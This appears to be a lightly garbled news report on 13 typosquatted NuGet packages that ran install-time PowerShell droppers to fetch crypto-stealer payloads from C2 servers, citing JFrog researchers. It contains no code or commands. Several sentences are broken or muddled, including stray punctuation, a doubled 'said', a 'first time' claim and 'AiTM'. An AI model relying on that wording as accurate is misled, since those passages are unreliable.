NuGet repositories have been targeted in a new “sophisticated and highly malicious attack” aimed at infecting .NET developer systems with cryptocurrency stealer malware.
13 malicious packages downloaded over 160,000 times in the past month have since been removed.
JFrog researchers Natan Nehorai and Brian Moussalli said, “The package contained a PowerShell script that ran on installation and triggered the download of a remotely executable ‘second stage’ payload.” said.
NuGet packages have been known to contain vulnerabilities and have been exploited in the past to spread phishing links, but this is the first time a package has been found containing malicious code. .
The three most downloaded packages (Coinbase.Core, Anarchy.Wrapper.Net, and DiscordRichPresence.API) alone accounted for 166,000 downloads, but attackers used bots to artificially inflate downloads. , which may have masqueraded as more legitimate.
The use of Coinbase and Discord underscores the continued reliance on typosquatting techniques, which assign fake packages names similar to legitimate packages in order to trick developers into downloading them.
Malware embedded in software packages is designed to act as a dropper script and automatically execute PowerShell code that retrieves subsequent binaries from hardcoded servers.
As an additional obfuscation mechanism, some packages did not directly embed the malicious payload, but fetched it as a dependency via another booby-trapped package.
To make matters worse, connections to command and control (C2) servers are made over HTTP (rather than HTTPS), making them vulnerable to man-in-the-middle (AiTM) attacks.
The second stage malware, described by JFrog as a “fully customized executable payload”, is retrieved from a C2 server and can be dynamically switched at will.
Discover the hidden dangers of third-party SaaS apps
Are you aware of the risks associated with third-party app access to your company’s SaaS apps? Join our webinar to learn about the types of permissions granted and how to minimize the risks.
reserve a seat
The second stage offers several features such as a crypto stealer and an auto-update module that pings a C2 server to get updated versions of the malware.
The findings come at a time when the software supply chain has become an increasingly lucrative conduit for compromising developers’ systems and smuggling backdoor code to downstream users.
“This proves that no open source repository is safe from malicious actors,” Shachar Menashe, senior director of JFrog Security Research, said in a statement to The Hacker News.
“.NET developers using NuGet are still at high risk of infecting their environment with malicious code and should exercise caution when curating the open source components they use in their builds and at all stages of the software development lifecycle. , we need to ensure that the software supply chain remains secure.”
